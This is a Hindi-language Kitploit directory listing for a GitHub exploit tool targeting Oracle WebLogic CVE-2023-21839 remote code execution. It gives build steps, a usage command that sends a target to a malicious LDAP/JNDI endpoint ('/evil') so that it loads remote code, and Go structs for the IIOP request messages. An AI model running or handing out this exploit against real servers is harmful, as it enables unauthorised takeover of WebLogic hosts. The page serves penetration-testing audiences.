Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-21839 — Weblogic CVE-2023-21839 RCE (बिना Java निर्भरता के एक-क्लिक RCE) | Kitploit
उपकरण/GitHubGitHub/askyeye/cve-2023-21839
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubaskyeye/cve-2023-21839

CVE-2023-21839

Weblogic CVE-2023-21839 RCE (बिना Java निर्भरता के एक-क्लिक RCE)

रिपॉजिटरी देखें
11510710 दिन पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-21839

इस परियोजना का उपयोग करके अनधिकृत रूप से लक्ष्यों पर हमला करना या परीक्षण करना अवैध है। यह प्रोग्राम केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए होना चाहिए।

परिचय

Weblogic CVE-2023-21839 RCE

(1) बिना किसी Java निर्भरता के, सॉकेट के माध्यम से प्रोटोकॉल बनाकर सीधे RCE

(2) IIOP के NAT नेटवर्क समस्या को हल किया गया (Docker और सार्वजनिक नेटवर्क लक्ष्यों का परीक्षण किया जा सकता है)

(3) Windows/Mac OS/Linux और Weblogic 12/14 पर परीक्षण सफल रहा

(4) कृपया JDK 8u191 से पुराने संस्करण का उपयोग करके Weblogic चलाएँ और स्वयं JNDI सर्वर सेटअप करें

उपयोग

root@kitploit:~
cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

अन्य

अनुरोध का पता लगाएँ

root@kitploit:~
type LocateRequest struct {
	Header            *Header
	RequestId         []byte // 4
	TargetAddress     []byte // 2
	_reserved         []byte // 2
	_keyAddressLength []byte // 4
	KeyAddress        []byte // _keyAddressLength
}

अनुरोध हल करें

root@kitploit:~
type ResolveRequest struct {
	Header             *Header
	RequestId          []byte // 4
	ResponseFlags      []byte // 1
	_reserved1         []byte // 3
	TargetAddress      []byte // 2
	_reserved2         []byte // 2
	_keyAddressLength  []byte // 4
	KeyAddress         []byte // _keyAddressLength
	_operationLength   []byte // 4
	RequestOperation   []byte // _operationLength
	_reserved3         []byte // 1
	ServiceContextList *ServiceContextList
	CosNamingDissector []byte // no limit
}

पुनः बाइंड अनुरोध

root@kitploit:~
type RebindRequest struct {
	Header             *Header
	RequestId          []byte // 4
	ResponseFlags      []byte // 1
	_reserved1         []byte // 3
	TargetAddress      []byte // 2
	_reserved2         []byte // 2
	_keyAddressLength  []byte // 4
	KeyAddress         []byte // _keyAddressLength
	_operationLength   []byte // 4
	RequestOperation   []byte // _operationLength
	_reserved3         []byte // 2
	ServiceContextList *ServiceContextList
	StubData           []byte // no limit
}
टूल डाउनलोड करें